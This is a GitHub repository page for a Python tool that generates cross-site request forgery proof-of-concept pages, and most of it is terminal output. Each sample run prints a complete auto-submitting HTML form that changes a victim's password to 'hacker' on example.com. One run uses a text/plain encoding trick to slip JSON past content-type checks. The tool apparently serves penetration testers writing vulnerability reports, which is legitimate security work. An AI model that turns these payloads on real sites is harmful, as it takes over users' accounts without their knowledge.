- Notifications
You must be signed in to change notification settings - Fork3
farid007/csrf_poc_generator
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
This is a python script which generates PoC for Cross-site request forgery with autosubmit form. you just need to provide Url, method and parameters.
python3 -m pip install yattag
root@ghost:~# python3 csrf_poc_gen.py -husage: csrf_poc_gen.py [-h] [-m METHOD] [-u URL] [-p PARAMETERS] [-a AUTHOR] [-e ENCTYPE]This is a pyhton script which generates PoC for Cross-site request forgerywith autosubmit form. you just need to provide Url, method and parameters.optional arguments: -h, --help show this help message and exit -m METHOD, --method METHOD Method -u URL, --url URL url -p PARAMETERS, --parameters PARAMETERS Request parameters -a AUTHOR, --author AUTHOR Name of Author -e ENCTYPE, --enctype ENCTYPE enctypeNote: Some applications accept Json data when Content-type:text/plain.
root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p '{new_password: "hacker", re_password: "hacker", extra": =extra}' -e "text/plain"<html> <title> This CSRF was found by </title> <body> <h1> This POC was Created By CSRF PoC Generator Tool </h1> <form action="http://example.com" method="POST" enctype="text/plain"> <input type="hidden" name="{new_password: %22hacker%22, re_password: %22hacker%22, extra%22: " value="extra}" /> </form> <script>document.forms[0].submit();</script> </body></html>Note: Parameters should be in the form of key value pair (key=value&key=value).
root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p "new_password=hacker&re_new_password=hacker" <html> <title> This CSRF was found by </title> <body> <h1> This POC was Created By CSRF PoC Generator Tool </h1> <form action="http://example.com" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="new_password" value="hacker" /> <input type="hidden" name="re_new_password" value="hacker" /> </form> <script>document.forms[0].submit();</script> </body></html>it supports 3 enctypeapplication/x-www-form-urlencoded,multipart/form-data andtext/plain.
root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p "new_password=hacker&re_new_password=hacker" -e "text/plain"<html> <title> This CSRF was found by </title> <body> <h1> This POC was Created By CSRF PoC Generator Tool </h1> <form action="http://example.com" method="POST" enctype="text/plain"> <input type="hidden" name="new_password" value="hacker" /> <input type="hidden" name="re_new_password" value="hacker" /> </form> <script>document.forms[0].submit();</script> </body></html>root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p "new_password=hacker&re_new_password=hacker" -a "Hacker man"<html> <title> This CSRF was found by Hacker man </title> <body> <h1> This POC was Created By CSRF PoC Generator Tool </h1> <form action="http://example.com" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="new_password" value="hacker" /> <input type="hidden" name="re_new_password" value="hacker" /> </form> <script>document.forms[0].submit();</script> </body></html>